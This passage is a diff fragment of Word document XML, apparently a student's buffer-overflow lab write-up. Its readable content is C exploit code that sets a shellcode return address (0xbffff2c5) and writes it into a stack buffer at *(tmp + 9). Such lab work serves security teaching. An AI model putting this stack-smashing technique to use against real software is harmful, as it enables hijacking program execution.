+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>returnAddress</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>O</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>kay, from part 1 (1)(2) and part 3 I have my code:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:ind w:firstLine="255"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>// Part 1: Address of shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:ind w:firstLine="255"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>returnAddress</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0xbffff2c5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:ind w:firstLine="255"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">// or 0xbffff0d8 + 128; // 128 is a value can be decided by myself </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">about </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>from 128 to 240;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>returnAddress</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
